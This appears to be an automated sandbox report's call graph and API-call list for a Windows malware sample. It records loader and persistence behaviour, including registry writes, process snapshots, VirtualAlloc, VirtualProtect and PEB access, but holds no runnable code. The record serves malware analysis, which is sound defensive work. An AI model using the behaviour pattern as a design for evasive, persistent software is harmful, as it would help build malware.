406906 40745 408e70 40433->40745 40441 40648a 40435->40441 40436 406548 40442 402360 39 API calls 40436->40442 40443 4063d5 40437->40443 40438 406855 40438->40338 40444 402360 39 API calls 40438->40444 40440 406633 40447 402360 39 API calls 40440->40447 40448 406498 40441->40448 40449 40648e 40441->40449 40450 406550 40442->40450 40443->40338 41872 4071e0 53 API calls 2 library calls 40443->41872 40444->40338 40452 4066bc 40446->40452 40453 40663b 40447->40453 41880 4074f0 53 API calls 2 library calls 40448->41880 41879 407470 53 API calls 2 library calls 40449->41879 41887 407780 53 API calls 2 library calls 40450->41887 40451 408dc0 43 API calls 40458 406933 40451->40458 40459 4066c0 40452->40459 40460 40673e 40452->40460 41896 407b30 53 API calls 2 library calls 40453->41896 40464 408e70 43 API calls 40458->40464 41901 407cd0 53 API calls 2 library calls 40459->41901 41907 407e50 53 API calls 2 library calls 40460->41907 40462 406555 40472 402430 43 API calls 40462->40472 40463 40649d 40473 402430 43 API calls 40463->40473 40468 406948 40464->40468 40467 406640 40476 402430 43 API calls 40467->40476 40471 408dc0 43 API calls 40468->40471 40469 406743 40479 402430 43 API calls 40469->40479 40470 4066c5 40480 402430 43 API calls 40470->40480 40475 406960 40471->40475 40477 406565 40472->40477 40474 4064ad 40473->40474 40489 402360 39 API calls 40474->40489 40478 402360 39 API calls 40475->40478 40481 406650 40476->40481 41888 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40477->41888 40484 40696e 40478->40484 40485 406753 40479->40485 40486 4066d5 40480->40486 41897 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40481->41897 40483 40656e 40488 402360 39 API calls 40483->40488 40490 402360 39 API calls 40484->40490 40500 402360 39 API calls 40485->40500 41902 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40486->41902 40493 406576 40488->40493 40494 4064c1 40489->40494 40495 406979 40490->40495 40492 406659 40497 402360 39 API 
calls 40492->40497 41889 407800 53 API calls 2 library calls 40493->41889 40494->40338 41881 407580 53 API calls 2 library calls 40494->41881 40499 402360 39 API calls 40495->40499 40496 4066de 40501 402360 39 API calls 40496->40501 40502 406661 40497->40502 40506 406984 40499->40506 40507 406767 40500->40507 40508 4066e6 40501->40508 41898 407bc0 53 API calls 2 library calls 40502->41898 40504 40657b 40520 402430 43 API calls 40504->40520 40511 402360 39 API calls 40506->40511 40512 40676b 40507->40512 40513 4067be 40507->40513 41903 407d50 53 API calls 2 library calls 40508->41903 40510 406666 40523 402430 43 API calls 40510->40523 40514 40698f 40511->40514 41908 407ee0 53 API calls 2 library calls 40512->41908 41913 408060 53 API calls 2 library calls 40513->41913 40518 402360 39 API calls 40514->40518 40516 4066eb 40526 402430 43 API calls 40516->40526 40522 40699a 40518->40522 40519 406770 40529 402430 43 API calls 40519->40529 40524 40658b 40520->40524 40521 4067c3 40532 402430 43 API calls 40521->40532 40525 402360 39 API calls 40522->40525 40527 406676 40523->40527 40537 402360 39 API calls 40524->40537 40528 4069a5 40525->40528 40530 4066fb 40526->40530 41899 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40527->41899 40533 402360 39 API calls 40528->40533 40534 406780 40529->40534 41904 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40530->41904 40538 4067d3 40532->40538 40539 4069b0 40533->40539 41909 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40534->41909 40536 40667f 40542 402360 39 API calls 40536->40542 40543 40659f 40537->40543 40552 402360 39 API calls 40538->40552 40544 402360 39 API calls 40539->40544 40541 406704 40546 402360 39 API calls 40541->40546 40542->40338 40547 4065a8 40543->40547 41890 407890 53 API calls 2 library calls 40543->41890 40587 4069bf 40544->40587 40545 406789 40549 402360 39 API calls 40545->40549 40550 40670c 40546->40550 41891 407910 53 API calls 2 library calls 40547->41891 40555 
406791 40549->40555 41905 407dd0 53 API calls 2 library calls 40550->41905 40553 4067e7 40552->40553 40553->40338 41914 4080e0 53 API calls 2 library calls 40553->41914 40554 4065b2 40562 402430 43 API calls 40554->40562 41910 407f60 53 API calls 2 library calls 40555->41910 40558 406711 40564 402430 43 API calls 40558->40564 40560 406796 40566 402430 43 API calls 40560->40566 40561 4067f0 40569 402430 43 API calls 40561->40569 40563 4065c2 40562->40563 40574 402360 39 API calls 40563->40574 40567 406721 40564->40567 40565 406a1e Sleep 40565->40587 40570 4067a6 40566->40570 41906 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40567->41906 40573 406800 40569->40573 41911 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40570->41911 40572 40672a 40577 402360 39 API calls 40572->40577 41915 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40573->41915 40579 4065d6 40574->40579 40575 402430 43 API calls 40575->40587 40576 4067af 40580 402360 39 API calls 40576->40580 40577->40338 40579->40338 41892 4079a0 53 API calls 2 library calls 40579->41892 40582 4067b7 40580->40582 40581 406809 40583 402360 39 API calls 40581->40583 41912 407fe0 53 API calls 2 library calls 40582->41912 40586 406811 40583->40586 41916 408160 53 API calls 2 library calls 40586->41916 40587->40565 40587->40575 40588 406a27 40587->40588 40593 406a16 40587->40593 40590 402360 39 API calls 40588->40590 40592 406a2f 40590->40592 40591 406816 40596 402430 43 API calls 40591->40596 40748 408c40 40592->40748 40597 402360 39 API calls 40593->40597 40594 4067bc 40598 402430 43 API calls 40594->40598 40601 406826 40596->40601 40597->40565 40598->40423 40599 406a40 40600 408c40 43 API calls 40599->40600 40602 406a59 40600->40602 41917 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40601->41917 40604 408c40 43 API calls 40602->40604 40606 406a6c 40604->40606 40605 40682f 40607 402360 39 API calls 40605->40607 40765 404f50 40606->40765 40609 406837 40607->40609 41918 
4081e0 53 API calls 2 library calls 40609->41918 40610 406a81 40612 406aa1 40610->40612 40613 408c40 43 API calls 40610->40613 41921 408410 53 API calls 2 library calls 40612->41921 40615 406a9c 40613->40615 41248 403d20 40615->41248 40616 406aa9 40618 402430 43 API calls 40616->40618 40619 406ab9 40618->40619 40620 402360 39 API calls 40619->40620 40621 406acd 40620->40621 40622 406b70 40621->40622 40624 401770 41 API calls 40621->40624 41924 408580 53 API calls 2 library calls 40622->41924 40626 406ae8 40624->40626 40625 406b75 40629 402430 43 API calls 40625->40629 41922 4084a0 53 API calls 2 library calls 40626->41922 40628 406af1 40631 402430 43 API calls 40628->40631 40630 406b88 40629->40630 40632 402360 39 API calls 40630->40632 40634 406b01 40631->40634 40633 406b9f 40632->40633 40633->40281 40635 406ba3 40633->40635 40638 406b37 40634->40638 40639 406b28 Sleep 40634->40639 41925 4086f0 53 API calls 2 library calls 40635->41925 40637 406bb0 40641 402430 43 API calls 40637->40641 40644 402430 43 API calls 40638->40644 40639->40634 40640 406b35 40639->40640 40642 406b59 40640->40642 40643 406bbf 40641->40643 40645 402360 39 API calls 40642->40645 41926 408670 53 API calls 2 library calls 40643->41926 40647 406b4e 40644->40647 40648 406b61 40645->40648 40650 402360 39 API calls 40647->40650 41923 4017d0 CoUninitialize 40648->41923 40649 406bd3 40652 402430 43 API calls 40649->40652 40650->40642 40653 406be2 40652->40653 41927 408610 53 API calls __Init_thread_footer 40653->41927 40655 406bf0 40656 402430 43 API calls 40655->40656 40657 406bff 40656->40657 41928 4058d0 242 API calls 5 library calls 40657->41928 40659 406c08 40659->40281 40661 41081b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40660->40661 40661->40231 41932 4128a2 GetLastError 40662->41932 40666 4107c0 40665->40666 40667 4107ca 40665->40667 41976 4106b4 43 API calls 2 library calls 40666->41976 40667->40269 40680 403ad1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40669->40680 40670 408c40 43 API 
calls 40670->40680 40671 4099d7 CatchGuardHandler 5 API calls 40673 403c13 40671->40673 40673->40269 40674 403b6d 40675 403bb1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40674->40675 40676 403c17 40674->40676 40675->40671 40678 40cfaf 39 API calls 40676->40678 40677 403b55 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40677->40675 40677->40676 41977 408f40 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40677->41977 40679 403c1c 40678->40679 40680->40670 40680->40676 40680->40677 40682 406c4c 40681->40682 40690 406c7e 40681->40690 41978 409c85 6 API calls 40682->41978 40683 4099d7 CatchGuardHandler 5 API calls 40685 406c90 40683->40685 40685->40246 40686 406c56 40686->40690 41979 409f97 42 API calls 40686->41979 40688 406c74 41980 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40688->41980 40690->40683 40692 402453 40691->40692 40692->40692 40693 402730 43 API calls 40692->40693 40694 402465 40693->40694 40694->40251 40696 40236b 40695->40696 40697 402386 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40695->40697 40696->40697 40698 40cfaf 39 API calls 40696->40698 40697->40255 40700 4023aa 40698->40700 40699 4023e1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40699->40255 40700->40699 40701 40cfaf 39 API calls 40700->40701 40702 40242c 40701->40702 40704 401783 CallUnexpected 40703->40704 40705 409b4a 41 API calls 40704->40705 40706 40179a CallUnexpected 40705->40706 40706->40349 40708 4083b2 40707->40708 40716 4083ee 40707->40716 41981 409c85 6 API calls 40708->41981 40710 4099d7 CatchGuardHandler 5 API calls 40712 408400 40710->40712 40711 4083bc 40711->40716 41982 409f97 42 API calls 40711->41982 40712->40357 40714 4083e4 41983 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40714->41983 40716->40710 40718 40832c 40717->40718 40726 40835e 40717->40726 41984 409c85 6 API calls 40718->41984 40720 4099d7 CatchGuardHandler 5 API calls 40722 408370 40720->40722 40721 408336 40721->40726 
41985 409f97 42 API calls 40721->41985 40722->40374 40724 408354 41986 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40724->41986 40726->40720 40728 40829d 40727->40728 40736 4082e2 40727->40736 41987 409c85 6 API calls 40728->41987 40729 4099d7 CatchGuardHandler 5 API calls 40731 4082f5 40729->40731 40731->40398 40732 4082a7 40732->40736 41988 409f97 42 API calls 40732->41988 40734 4082d8 41989 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40734->41989 40736->40729 40738 408d74 40737->40738 40739 4092d0 43 API calls 40738->40739 40740 4068ee 40739->40740 40741 408dc0 40740->40741 40742 408ddb 40741->40742 40743 408def __InternalCxxFrameHandler 40742->40743 41990 402810 43 API calls 3 library calls 40742->41990 40743->40433 41991 4090f0 40745->41991 40747 40691b 40747->40451 40749 408c6a 40748->40749 40750 408d2d 40749->40750 40754 408c7e 40749->40754 42014 4015d0 43 API calls 3 library calls 40750->42014 40752 408c8a __InternalCxxFrameHandler 40752->40599 40753 408d32 42015 401530 41 API calls 2 library calls 40753->42015 40754->40752 40756 408cd8 40754->40756 40757 408cf9 40754->40757 40756->40753 40758 408cdf 40756->40758 40764 408cee __InternalCxxFrameHandler 40757->40764 42013 401530 41 API calls 3 library calls 40757->42013 42012 401530 41 API calls 3 library calls 40758->42012 40759 40cfaf 39 API calls 40761 408d3c 40759->40761 40763 408ce5 40763->40759 40763->40764 40764->40599 40766 4107e2 GetSystemTimeAsFileTime 40765->40766 40767 404f9f 40766->40767 40768 4106a2 39 API calls 40767->40768 40769 404fa8 CallUnexpected 40768->40769 40770 409b4a 41 API calls 40769->40770 40777 404ffc CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40770->40777 40772 402730 43 API calls 40772->40777 40774 4092d0 43 API calls 40774->40777 40776 401e20 44 API calls 40776->40777 40777->40772 40777->40774 40777->40776 40778 4052d0 Sleep 40777->40778 40779 4058bd 40777->40779 
40787 4052e0 CallUnexpected 40777->40787 42016 402470 40777->42016 42157 409c85 6 API calls 40777->42157 42158 409f97 42 API calls 40777->42158 42159 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40777->42159 40778->40777 40780 40cfaf 39 API calls 40779->40780 40781 4058c2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 40780->40781 40784 405964 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40781->40784 40785 405a0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40784->40785 40786 405a22 40784->40786 40788 4099d7 CatchGuardHandler 5 API calls 40785->40788 40789 40cfaf 39 API calls 40786->40789 40792 409b4a 41 API calls 40787->40792 40790 405a1e 40788->40790 40791 405a27 40789->40791 40790->40610 40794 4107e2 GetSystemTimeAsFileTime 40791->40794 40793 405315 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40792->40793 40793->40779 40801 402730 43 API calls 40793->40801 40806 4092d0 43 API calls 40793->40806 40808 401e20 44 API calls 40793->40808 40813 405682 40793->40813 40815 40fb0d 15 API calls ___std_exception_copy 40793->40815 40818 408c40 43 API calls 40793->40818 40830 403410 41 API calls 40793->40830 40873 405687 40793->40873 42031 4035b0 CryptAcquireContextW 40793->42031 42055 402ec0 40793->42055 42160 409c85 6 API calls 40793->42160 42161 409f97 42 API calls 40793->42161 42162 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40793->42162 40795 405a7f 40794->40795 40796 4106a2 39 API calls 40795->40796 40797 405a88 Sleep 40796->40797 40798 402730 43 API calls 40797->40798 40799 405aba 40798->40799 40802 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40799->40802 42163 4025a0 41 API calls 40799->42163 40801->40793 40803 402730 43 API calls 40802->40803 40851 405c80 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40802->40851 40803->40851 40806->40793 40808->40793 40810 403a90 43 
API calls 40810->40851 40811 4107b2 43 API calls 40811->40851 40812 409b4a 41 API calls 40812->40851 40814 40577c CoUninitialize 40813->40814 40821 405792 40814->40821 40815->40793 40816 4061c5 40817 406c20 53 API calls 40816->40817 40819 4061ec 40817->40819 40818->40793 40823 402430 43 API calls 40819->40823 40825 4057ae CoUninitialize 40821->40825 40827 4061fc 40823->40827 40837 4057bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40825->40837 40831 402360 39 API calls 40827->40831 40829 4092d0 43 API calls 40829->40851 40830->40793 40832 406210 40831->40832 40835 4062e5 40832->40835 40836 406218 40832->40836 40833 405895 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40834 4099d7 CatchGuardHandler 5 API calls 40833->40834 40838 4058b6 40834->40838 42180 406ec0 53 API calls 2 library calls 40835->42180 40843 406288 40836->40843 40844 40622b 40836->40844 40837->40779 40837->40833 40838->40610 40839 401e20 44 API calls 40839->40851 40840 40cfaf 39 API calls 40840->40851 40842 4062ea 40849 402430 43 API calls 40842->40849 42175 406db0 53 API calls 2 library calls 40843->42175 42170 406ca0 53 API calls 2 library calls 40844->42170 40845 406192 Sleep 40845->40851 40848 40628d 40854 402430 43 API calls 40848->40854 40852 4062fa 40849->40852 40850 406230 40855 402430 43 API calls 40850->40855 40851->40810 40851->40811 40851->40812 40851->40816 40851->40829 40851->40839 40851->40840 40851->40845 40853 402730 43 API calls 40851->40853 40856 40619e 40851->40856 40864 406c0b 40851->40864 40865 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40851->40865 42164 4025a0 41 API calls 40851->42164 42165 409c85 6 API calls 40851->42165 42166 409f97 42 API calls 40851->42166 42167 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40851->42167 40858 402360 39 API calls 40852->40858 40853->40851 40857 40629d 40854->40857 40859 406240 40855->40859 42168 408c10 43 API calls 40856->42168 42176 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 
40857->42176 40861 40630e 40858->40861 42171 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40859->42171 40867 4063e4 40861->40867 40868 406316 40861->40868 40872 403c20 21 API calls 40864->40872 40865->40845 40866 4062a6 40874 402360 39 API calls 40866->40874 42189 407260 53 API calls 2 library calls 40867->42189 42181 406f40 53 API calls 2 library calls 40868->42181 40869 4061aa 40876 402360 39 API calls 40869->40876 40870 406249 40871 402360 39 API calls 40870->40871 40878 406251 40871->40878 40879 406c10 40872->40879 40880 40571b Sleep 40873->40880 40890 40574a Sleep 40873->40890 42111 100010a3 40873->42111 42114 10001f20 40873->42114 40881 4062ae 40874->40881 40883 4061b2 40876->40883 42172 406d30 53 API calls 2 library calls 40878->42172 40880->40813 40880->40873 42177 406e40 53 API calls 2 library calls 40881->42177 40882 40631b 40894 402430 43 API calls 40882->40894 40887 402360 39 API calls 40883->40887 40884 4063e9 40893 402430 43 API calls 40884->40893 40888 4061ba 40887->40888 42169 4017d0 CoUninitialize 40888->42169 40889 406256 40898 402430 43 API calls 40889->40898 40890->40813 40891 4062b3 40899 402430 43 API calls 40891->40899 40895 4063f9 40893->40895 40896 40632b 40894->40896 40904 402360 39 API calls 40895->40904 42182 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40896->42182 40901 406266 40898->40901 40902 4062c3 40899->40902 40900 406334 40903 402360 39 API calls 40900->40903 42173 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40901->42173 42178 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40902->42178 40908 40633c 40903->40908 40909 40640d 40904->40909 40907 4062cc 40911 402360 39 API calls 40907->40911 42183 406fc0 53 API calls 2 library calls 40908->42183 40913 4064ce 40909->40913 42190 4072e0 53 API calls 2 library calls 40909->42190 40910 40626f 40914 402360 39 API calls 40910->40914 40915 4062d4 40911->40915 42198 407600 53 API calls 2 library calls 40913->42198 40919 406277 
40914->40919 42179 408c10 43 API calls 40915->42179 40916 406341 40925 402430 43 API calls 40916->40925 42174 408c10 43 API calls 40919->42174 40921 40641a 40928 402430 43 API calls 40921->40928 40922 4064d8 40929 402430 43 API calls 40922->40929 40924 406283 40926 40686e 40924->40926 42236 402330 43 API calls 40924->42236 40927 406351 40925->40927 40931 401770 41 API calls 40926->40931 42184 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40927->42184 40933 40642a 40928->40933 40934 4064e8 40929->40934 40935 406881 40931->40935 42191 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40933->42191 40942 402360 39 API calls 40934->40942 40939 408380 53 API calls 40935->40939 40936 40635a 40940 402360 39 API calls 40936->40940 40938 406433 40941 402360 39 API calls 40938->40941 40943 40688a 40939->40943 40944 406362 40940->40944 40945 40643b 40941->40945 40946 4064fc 40942->40946 40954 402430 43 API calls 40943->40954 42185 407040 53 API calls 2 library calls 40944->42185 42192 407360 53 API calls 2 library calls 40945->42192 40949 4065e3 40946->40949 42199 407680 53 API calls 2 library calls 40946->42199 42209 407a20 53 API calls 2 library calls 40949->42209 40950 406367 40959 402430 43 API calls 40950->40959 40952 406440 40962 402430 43 API calls 40952->40962 40955 40689d 40954->40955 40958 408300 53 API calls 40955->40958 40956 4065ed 40963 402430 43 API calls 40956->40963 40957 406509 40965 402430 43 API calls 40957->40965 40960 4068a8 40958->40960 40961 406377 40959->40961 40969 402430 43 API calls 40960->40969 40970 402360 39 API calls 40961->40970 40964 406450 40962->40964 40966 4065fd 40963->40966 42193 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40964->42193 40968 406519 40965->40968 40980 402360 39 API calls 40966->40980 42200 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40968->42200 40973 4068bb 40969->40973 40974 40638b 40970->40974 40971 406459 40975 402360 39 API calls 40971->40975 40977 408260 53 API 
calls 40973->40977 40978 4063ac 40974->40978 40979 40638f 40974->40979 40981 406461 40975->40981 40976 406522 40982 402360 39 API calls 40976->40982 40984 4068c6 40977->40984 42187 407150 53 API calls 2 library calls 40978->42187 42186 4070d0 53 API calls 2 library calls 40979->42186 40986 406611 40980->40986 42194 4073e0 53 API calls 2 library calls 40981->42194 40988 40652a 40982->40988 40998 402430 43 API calls 40984->40998 40991 406693 40986->40991 40992 406615 40986->40992 42201 407700 53 API calls 2 library calls 40988->42201 40989 4063b1 41002 402430 43 API calls 40989->41002 40990 406394 41004 402430 43 API calls 40990->41004 42216 407c40 53 API calls 2 library calls 40991->42216 42210 407ab0 53 API calls 2 library calls 40992->42210 40993 406466 41001 402430 43 API calls 40993->41001 40995 40652f 41006 402430 43 API calls 40995->41006 41003 4068d9 40998->41003 40999 406698 41013 402430 43 API calls 40999->41013 41000 40661a 41010 402430 43 API calls 41000->41010 41005 406476 41001->41005 41007 4063c1 41002->41007 41008 408d60 43 API calls 41003->41008 41009 4063a4 41004->41009 41021 402360 39 API calls 41005->41021 41011 40653f 41006->41011 41023 402360 39 API calls 41007->41023 41012 4068ee 41008->41012 42235 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41009->42235 41015 40662a 41010->41015 42202 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41011->42202 41018 408dc0 43 API calls 41012->41018 41014 4066a8 41013->41014 41032 402360 39 API calls 41014->41032 42211 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41015->42211 41019 406906 41018->41019 41025 408e70 43 API calls 41019->41025 41027 40648a 41021->41027 41022 406548 41028 402360 39 API calls 41022->41028 41029 4063d5 41023->41029 41024 406855 41024->40924 41030 402360 39 API calls 41024->41030 41031 40691b 41025->41031 41026 406633 41033 402360 39 API calls 41026->41033 41034 406498 41027->41034 41035 40648e 41027->41035 41036 406550 41028->41036 41029->40924 
42188 4071e0 53 API calls 2 library calls 41029->42188 41030->40924 41037 408dc0 43 API calls 41031->41037 41038 4066bc 41032->41038 41039 40663b 41033->41039 42196 4074f0 53 API calls 2 library calls 41034->42196 42195 407470 53 API calls 2 library calls 41035->42195 42203 407780 53 API calls 2 library calls 41036->42203 41044 406933 41037->41044 41045 4066c0 41038->41045 41046 40673e 41038->41046 42212 407b30 53 API calls 2 library calls 41039->42212 41050 408e70 43 API calls 41044->41050 42217 407cd0 53 API calls 2 library calls 41045->42217 42223 407e50 53 API calls 2 library calls 41046->42223 41048 406555 41058 402430 43 API calls 41048->41058 41049 40649d 41059 402430 43 API calls 41049->41059 41054 406948 41050->41054 41053 406640 41062 402430 43 API calls 41053->41062 41057 408dc0 43 API calls 41054->41057 41055 406743 41065 402430 43 API calls 41055->41065 41056 4066c5 41066 402430 43 API calls 41056->41066 41061 406960 41057->41061 41063 406565 41058->41063 41060 4064ad 41059->41060 41075 402360 39 API calls 41060->41075 41064 402360 39 API calls 41061->41064 41067 406650 41062->41067 42204 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41063->42204 41070 40696e 41064->41070 41071 406753 41065->41071 41072 4066d5 41066->41072 42213 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41067->42213 41069 40656e 41074 402360 39 API calls 41069->41074 41076 402360 39 API calls 41070->41076 41086 402360 39 API calls 41071->41086 42218 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41072->42218 41079 406576 41074->41079 41080 4064c1 41075->41080 41081 406979 41076->41081 41078 406659 41083 402360 39 API calls 41078->41083 42205 407800 53 API calls 2 library calls 41079->42205 41080->40924 42197 407580 53 API calls 2 library calls 41080->42197 41085 402360 39 API calls 41081->41085 41082 4066de 41087 402360 39 API calls 41082->41087 41088 406661 41083->41088 41092 406984 41085->41092 41093 406767 41086->41093 41094 4066e6 
42677->42693 42680 412beb 42681 412bf5 42680->42681 42686 412c0c 42680->42686 42694 4193d9 39 API calls 2 library calls 42681->42694 42683 412cee 42683->42690 42697 40d09d 14 API calls __dosmaperr 42683->42697 42685 412c96 42685->42690 42695 40d09d 14 API calls __dosmaperr 42685->42695 42686->42683 42686->42685 42688 412ce2 42696 40cf9f 39 API calls __cftof 42688->42696 42690->41846 42691->42676 42692->42690 42693->42680 42694->42690 42695->42688 42696->42690 42697->42690 42699 4104cc 42698->42699 42700 4104de 42698->42700 42725 40a69e GetModuleHandleW 42699->42725 42710 410330 42700->42710 42703 4104d1 42703->42700 42726 410580 GetModuleHandleExW 42703->42726 42705 40a1e4 42705->40214 42711 41033c ___scrt_is_nonwritable_in_current_image 42710->42711 42732 41088b EnterCriticalSection 42711->42732 42713 410346 42733 4103b7 42713->42733 42715 410353 42737 410371 42715->42737 42718 410536 42742 410567 42718->42742 42720 410540 42721 410554 42720->42721 42722 410544 GetCurrentProcess TerminateProcess 42720->42722 42723 410580 CallUnexpected 3 API calls 42721->42723 42722->42721 42724 41055c ExitProcess 42723->42724 42725->42703 42727 4105e0 42726->42727 42728 4105bf GetProcAddress 42726->42728 42730 4105e6 FreeLibrary 42727->42730 42731 4104dd 42727->42731 42728->42727 42729 4105d3 42728->42729 42729->42727 42730->42731 42731->42700 42732->42713 42734 4103c3 ___scrt_is_nonwritable_in_current_image CallUnexpected 42733->42734 42736 410427 CallUnexpected 42734->42736 42740 411fe5 14 API calls 2 library calls 42734->42740 42736->42715 42741 4108d3 LeaveCriticalSection 42737->42741 42739 41035f 42739->42705 42739->42718 42740->42736 42741->42739 42745 414fe9 5 API calls CallUnexpected 42742->42745 42744 41056c CallUnexpected 42744->42720 42745->42744 42746 f4c95e 42747 f4c96d 42746->42747 42750 f4d0fe 42747->42750 42752 f4d119 42750->42752 42751 f4d122 CreateToolhelp32Snapshot 42751->42752 42753 f4d13e Module32First 42751->42753 42752->42751 42752->42753 42754 f4c976 
42753->42754 42755 f4d14d 42753->42755 42757 f4cdbd 42755->42757 42758 f4cde8 42757->42758 42759 f4cdf9 VirtualAlloc 42758->42759 42760 f4ce31 42758->42760 42759->42760 42761 9b60c0 42762 9b96da LoadLibraryA 42761->42762 42764 9b9cd2 42762->42764 42765 4d1003c 42766 4d10049 42765->42766 42780 4d10e0f SetErrorMode SetErrorMode 42766->42780 42771 4d10265 42772 4d102ce VirtualProtect 42771->42772 42774 4d1030b 42772->42774 42773 4d10439 VirtualFree 42778 4d105f4 LoadLibraryA 42773->42778 42779 4d104be 42773->42779 42774->42773 42775 4d104e3 LoadLibraryA 42775->42779 42777 4d108c7 42778->42777 42779->42775 42779->42778 42781 4d10223 42780->42781 42782 4d10d90 42781->42782 42783 4d10dad 42782->42783 42784 4d10dbb GetPEB 42783->42784 42785 4d10238 VirtualAlloc 42783->42785 42784->42785 42785->42771 42786 100079ee 42787 10007a2c 42786->42787 42792 100079fc _unexpected 42786->42792 42794 10005926 12 API calls __dosmaperr 42787->42794 42789 10007a17 RtlAllocateHeap 42790 10007a2a 42789->42790 42789->42792 42792->42787 42792->42789 42793 10005aed EnterCriticalSection LeaveCriticalSection _unexpected 42792->42793 42793->42792 42794->42790
                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?,92291A76,74DF0F00,00000000), ref: 00403D8A
                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F19
                                            • Sleep.KERNEL32(000003E8), ref: 00403F22
                                            • __Init_thread_footer.LIBCMT ref: 004044F7
                                            • __Init_thread_footer.LIBCMT ref: 004046BD
                                            • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 004048C7
                                            • __Init_thread_footer.LIBCMT ref: 00404955
                                            • __Init_thread_footer.LIBCMT ref: 00404BBE
                                            • CoInitialize.OLE32(00000000), ref: 00404C3F
                                            • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404C5A
                                            • __Init_thread_footer.LIBCMT ref: 004050BD
                                            • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                            • __Init_thread_footer.LIBCMT ref: 004053CB
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404CC8
                                              • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,92291A76), ref: 004107F7
                                              • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            • CoUninitialize.COMBASE(?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D,?,?,?,?,00000000,0042DA28), ref: 00404D01
                                            • CoUninitialize.OLE32(?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404DC4
                                            • CoUninitialize.OLE32(?,?,?,?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404E45
                                            • __Init_thread_footer.LIBCMT ref: 00404026
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
